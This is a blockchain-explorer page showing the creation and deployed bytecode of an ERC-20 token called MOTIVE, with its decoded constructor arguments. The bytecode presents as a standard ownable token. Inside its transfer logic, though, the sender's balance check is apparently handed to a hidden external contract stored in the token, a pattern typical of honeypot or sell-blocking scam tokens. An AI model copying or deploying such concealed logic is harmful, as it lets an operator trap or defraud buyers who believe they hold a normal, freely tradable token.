050565b60008115159050919050565b610f5f81610f4a565b82525050565b6000602082019050610f7a6000830184610f56565b92915050565b610f8981610ed4565b82525050565b6000602082019050610fa46000830184610f80565b92915050565b600080600060608486031215610fc357610fc2610e71565b5b6000610fd186828701610ebf565b9350506020610fe286828701610ebf565b9250506040610ff386828701610ef5565b9150509250925092565b600060ff82169050919050565b61101381610ffd565b82525050565b600060208201905061102e600083018461100a565b92915050565b60006020828403121561104a57611049610e71565b5b600061105884828501610ebf565b91505092915050565b61106a81610e96565b82525050565b60006020820190506110856000830184611061565b92915050565b600080604083850312156110a2576110a1610e71565b5b60006110b085828601610ebf565b92505060206110c185828601610ebf565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061111257607f821691505b602082108103611125576111246110cb565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061116582610ed4565b915061117083610ed4565b92508282019050808211156111885761118761112b565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006111ea602583610dca565b91506111f58261118e565b604082019050919050565b60006020820190508181036000830152611219816111dd565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b600061127c602483610dca565b915061128782611220565b604082019050919050565b600060208201905081810360008301526112ab8161126f565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b600061130e602283610dca565b9150611319826112b2565b604082019050919050565b6000602082019050818103600083015261133d81611301565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b600061137a601d83610dca565b915061138582611344565b602082019050919050565b600060208201905081810360008301526113a98161136d565b9050919050565b7f45524332303a2066726f6d20746f20746865207a65726f206164647265737300600082015250565b60006113e6601f83610dca565b91506113f1826113b0565b602082019050919050565b60006020820190508181036000830152611415816113d9565b9050919050565b7f45524332303a20746f20746f20746865207a65726f2061646472657373000000600082015250565b6000611452601d83610dca565b915061145d8261141c565b602082019050919050565b6000602082019050818103600083015261148181611445565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b60006114e4602683610dca565b91506114ef82611488565b604082019050919050565b60006020820190508181036000830152611513816114d7565b9050919050565b600061152582610ed4565b915061153083610ed4565b92508282039050818111156115485761154761112b565b5b92915050565b60006060820190506115636000830186610f56565b6115706020830185610f80565b61157d6040830184611061565b949350505050565b60008151905061159481610ede565b92915050565b6000602082840312156115b0576115af610e71565b5b60006115be84828501611585565b9150509291505056fea2646970667358221220a3aba1959b5f92a6ddf19d2733e9e40853fc5cc3cde649e48a52a57f0da25d1664736f6c6343000814003300000000000000000000000000000000000000000000000000000002540be400000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000064d4f54495645000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000064d4f544956450000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100ea5760003560e01c8063715018a61161008c578063a457c2d711610066578063a457c2d71461024f578063a9059cbb1461027f578063dd62ed3e146102af578063f2fde38b146102df576100ea565b8063715018a6146102095780638da5cb5b1461021357806395d89b4114610231576100ea565b806323b872dd116100c857806323b872dd1461015b578063313ce5671461018b57806339509351146101a957806370a08231146101d9576100ea565b806306fdde03146100ef578063095ea7b31461010d57806318160ddd1461013d575b600080fd5b6100f76102fb565b6040516101049190610e4f565b60405180910390f35b61012760048036038101906101229190610f0a565b61038d565b6040516101349190610f65565b60405180910390f35b6101456103b0565b6040516101529190610f8f565b60405180910390f35b61017560048036038101906101709190610faa565b6103ba565b6040516101829190610f65565b60405180910390f35b6101936103e9565b6040516101a09190611019565b60405180910390f35b6101c360048036038101906101be9190610f0a565b6103f2565b6040516101d09190610f65565b60405180910390f35b6101f360048036038101906101ee9190611034565b610429565b6040516102009190610f8f565b60405180910390f35b610211610472565b005b61021b610486565b6040516102289190611070565b60405180910390f35b6102396104af565b6040516102469190610e4f565b60405180910390f35b61026960048036038101906102649190610f0a565b610541565b6040516102769190610f65565b60405180910390f35b61029960048036038101906102949190610f0a565b6105b8565b6040516102a69190610f65565b60405180910390f35b6102c960048036038101906102c4919061108b565b6105db565b6040516102d69190610f8f565b60405180910390f35b6102f960048036038101906102f49190611034565b610662565b005b60606005805461030a906110fa565b80601f0160208091040260200160405190810160405280929190818152602001828054610336906110fa565b80156103835780601f1061035857610100808354040283529160200191610383565b820191906000526020600020905b81548152906001019060200180831161036657829003601f168201915b5050505050905090565b6000806103986106e8565b90506103a58185856106f0565b600191505092915050565b6000600354905090565b6000806103c56106e8565b90506103d28582856108b9565b6103dd858585610945565b60019150509392505050565b60006012905090565b6000806103fd6106e8565b905061041e81858561040f85896105db565b610419919061115a565b6106f0565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b61047a610bc9565b6104846000610c50565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600680546104be906110fa565b80601f01602080910402602001604051908101604052809291908181526020018280546104ea906110fa565b80156105375780601f1061050c57610100808354040283529160200191610537565b820191906000526020600020905b81548152906001019060200180831161051a57829003601f168201915b5050505050905090565b60008061054c6106e8565b9050600061055a82866105db565b90508381101561059f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161059690611200565b60405180910390fd5b6105ac82868684036106f0565b60019250505092915050565b6000806105c36106e8565b90506105d0818585610945565b600191505092915050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b61066a610bc9565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036106dc5760006040517f1e4fbdf70000000000000000000000000000000000000000000000000000000081526004016106d39190611070565b60405180910390fd5b6106e581610c50565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361075f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161075690611292565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036107ce576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107c590611324565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516108ac9190610f8f565b60405180910390a3505050565b60006108c584846105db565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff811461093f5781811015610931576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161092890611390565b60405180910390fd5b61093e84848484036106f0565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036109b4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109ab906113fc565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a23576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a1a90611468565b60405180910390fd5b60008390506000610a73600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205483610d14565b905082811015610ab8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610aaf906114fa565b60405180910390fd5b8281610ac4919061151a565b600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555082600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610b56919061115a565b925050819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610bba9190610f8f565b60405180910390a35050505050565b610bd16106e8565b73ffffffffffffffffffffffffffffffffffffffff16610bef610486565b73ffffffffffffffffffffffffffffffffffffffff1614610c4e57610c126106e8565b6040517f118cdaa7000000000000000000000000000000000000000000000000000000008152600401610c459190611070565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166330039c3b600185856040518463ffffffff1660e01b8152600401610d769392919061154e565b602060405180830381865afa158015610d93573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610db7919061159a565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015610df9578082015181840152602081019050610dde565b60008484015250505050565b6000601f19601f8301169050919050565b6000610e2182610dbf565b610e2b8185610dca565b9350610e3b818560208601610ddb565b610e4481610e05565b840191505092915050565b60006020820190508181036000830152610e698184610e16565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610ea182610e76565b9050919050565b610eb181610e96565b8114610ebc57600080fd5b50565b600081359050610ece81610ea8565b92915050565b6000819050919050565b610ee781610ed4565b8114610ef257600080fd5b50565b600081359050610f0481610ede565b92915050565b60008060408385031215610f2157610f20610e71565b5b6000610f2f85828601610ebf565b9250506020610f4085828601610ef5565b9150509250929050565b60008115159050919050565b610f5f81610f4a565b82525050565b6000602082019050610f7a6000830184610f56565b92915050565b610f8981610ed4565b82525050565b6000602082019050610fa46000830184610f80565b92915050565b600080600060608486031215610fc357610fc2610e71565b5b6000610fd186828701610ebf565b9350506020610fe286828701610ebf565b9250506040610ff386828701610ef5565b9150509250925092565b600060ff82169050919050565b61101381610ffd565b82525050565b600060208201905061102e600083018461100a565b92915050565b60006020828403121561104a57611049610e71565b5b600061105884828501610ebf565b91505092915050565b61106a81610e96565b82525050565b60006020820190506110856000830184611061565b92915050565b600080604083850312156110a2576110a1610e71565b5b60006110b085828601610ebf565b92505060206110c185828601610ebf565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061111257607f821691505b602082108103611125576111246110cb565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061116582610ed4565b915061117083610ed4565b92508282019050808211156111885761118761112b565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006111ea602583610dca565b91506111f58261118e565b604082019050919050565b60006020820190508181036000830152611219816111dd565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b600061127c602483610dca565b915061128782611220565b604082019050919050565b600060208201905081810360008301526112ab8161126f565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b600061130e602283610dca565b9150611319826112b2565b604082019050919050565b6000602082019050818103600083015261133d81611301565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b600061137a601d83610dca565b915061138582611344565b602082019050919050565b600060208201905081810360008301526113a98161136d565b9050919050565b7f45524332303a2066726f6d20746f20746865207a65726f206164647265737300600082015250565b60006113e6601f83610dca565b91506113f1826113b0565b602082019050919050565b60006020820190508181036000830152611415816113d9565b9050919050565b7f45524332303a20746f20746f20746865207a65726f2061646472657373000000600082015250565b6000611452601d83610dca565b915061145d8261141c565b602082019050919050565b6000602082019050818103600083015261148181611445565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b60006114e4602683610dca565b91506114ef82611488565b604082019050919050565b60006020820190508181036000830152611513816114d7565b9050919050565b600061152582610ed4565b915061153083610ed4565b92508282039050818111156115485761154761112b565b5b92915050565b60006060820190506115636000830186610f56565b6115706020830185610f80565b61157d6040830184611061565b949350505050565b60008151905061159481610ede565b92915050565b6000602082840312156115b0576115af610e71565b5b60006115be84828501611585565b9150509291505056fea2646970667358221220a3aba1959b5f92a6ddf19d2733e9e40853fc5cc3cde649e48a52a57f0da25d1664736f6c63430008140033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

00000000000000000000000000000000000000000000000000000002540be400000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000064d4f54495645000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000064d4f544956450000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : totalSupply_ (uint256): 10000000000
Arg [1] : _name_ (string): MOTIVE
Arg [2] : _symbol_ (string): MOTIVE

-----Encoded View---------------
7 Constructor Arguments found :
Arg [0] : 00000000000000000000000000000000000000000000000000000002540be400
Arg [1] : 0000000000000000000000000000000000000000000000000000000000000060
Arg [2] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [3] : 0000000000000000000000000000000000000000000000000000000000000006
Arg [4] : 4d4f544956450000000000000000000000000000000000000000000000000000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000006
Arg [6] : 4d4f544956450000000000000000000000000000000000000000000000000000


Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.